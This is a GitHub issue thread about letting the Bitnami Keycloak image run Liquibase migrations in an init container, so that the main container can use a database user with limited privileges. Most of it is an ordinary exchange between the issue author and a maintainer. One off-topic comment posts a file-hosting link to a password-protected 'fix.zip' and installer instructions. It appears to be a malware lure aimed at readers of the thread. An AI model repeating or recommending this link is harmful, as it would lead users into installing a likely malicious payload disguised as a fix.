### ISSUE TITLE
[bitnami/keycloak] Use an init container that limits the database access

### ISSUE THREAD

**Issue by bguijt** [bitnami/containers#71321]
### Name and Version

bitnami/keycloak:22.1.3

### What is the problem this feature will solve?

The configured database user has ownership access to all of the Keycloak database. This violates the Principle of Least Privilege.

### What is the feature you are proposing to solve the problem?

I would like to propose the ability to configure an InitContainer with the only purpose to run the Liquibase changelogs with an admin database account. The main Keycloak container should be able to work with a 'normal' user account, and skip the liquibase init part.

### What alternatives have you considered?

Creating a Liquibase InitContainer myself, adding the Keycloak changelog files from somewhere, and execute that - hoping the Liquibase initialization in the Keycloak image skips the whole process.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by javsalgar** [comment]
Hi!

Thank you so much for the feature request. Did you try using the `initContainers` section to first try the init container you mention and see if it works?

**Comment by bguijt** [comment]
Hi @javsalgar, not yet; I need to get Keycloak running decently before spending time on this. I hope to be able to give it a try next week.
